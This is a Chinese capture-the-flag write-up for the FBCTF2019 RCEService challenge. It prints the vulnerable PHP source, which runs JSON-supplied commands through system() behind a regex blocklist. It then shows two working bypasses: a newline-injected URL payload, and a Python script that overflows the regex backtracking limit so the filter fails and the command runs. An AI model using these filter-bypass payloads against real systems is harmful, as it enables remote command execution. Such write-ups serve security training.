[FBCTF2019]RCEService_WP

分析

文章目录

  • Enter command as JSON:
  • 这便是打开页面的提示了,需要提交命令以JSON的形式,所以在这里先了解一下JSON是什么
  • 了解于此
  • 简单来说形式如下:{名称:值}
  • 在这里插入图片描述
  • 检验成功,下来便是通过命令执行获取flag了
  • 接着其实是想cat源码看一看,毕竟一个RCE肯定会有许多过滤,但不管怎样cat,以见过的绕过方式去尝试都是没有回显的,便去看了各位师傅的wp,都说是网上搜的源码,咱也不明白咋来的,就直接奉上吧

源码

 <?php

putenv('PATH=/home/rceservice/jail');

if (isset($_REQUEST['cmd'])) {
  $json = $_REQUEST['cmd'];

  if (!is_string($json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } else {
    echo 'Attempting to run command:<br/>';
    $cmd = json_decode($json, true)['cmd'];
    if ($cmd !== NULL) {
      system($cmd);
    } else {
      echo 'Invalid input';
    }
    echo '<br/><br/>';
  }
}

?>
  • 如果就简单的从过滤的这些东西着手去绕过那绝对是要“死人”的,看看限制函数preg_match的特征
  • preg_match只能匹配第一行的数据,考虑换行绕过

题解

  • preg_match绕过总结

  • 经过查阅了解到并不是我先前的cat被过滤,毕竟preg_match函数中并没有cat,而是因为PATH下没有cat

  • payload

?cmd={%0A"cmd":"/bin/cat /home/rceservice/flag"%0A}

Linux命令的位置:/bin,/usr/bin,默认都是全体用户使用,/sbin,/usr/sbin,默认root用户使用
故在payload中使用cat我们先在bin目录下找到,再进行读取flag

在这里插入图片描述

  • 第二种解法是利用回溯次数,当我们将字符串长度突破一个回溯限制,便会让正则匹配返回flase,过滤失效
  • 脚本
import requests

payload = '{"cmd":"/bin/cat /home/rceservice/flag","test":"' + "a"*(1000000) + '"}'
res = requests.post("http://ad66432f-4628-41f6-8190-d9b9c247904c.node3.buuoj.cn/", data={"cmd":payload})
#print(payload)
print(res.text)
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Acco_30_L

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值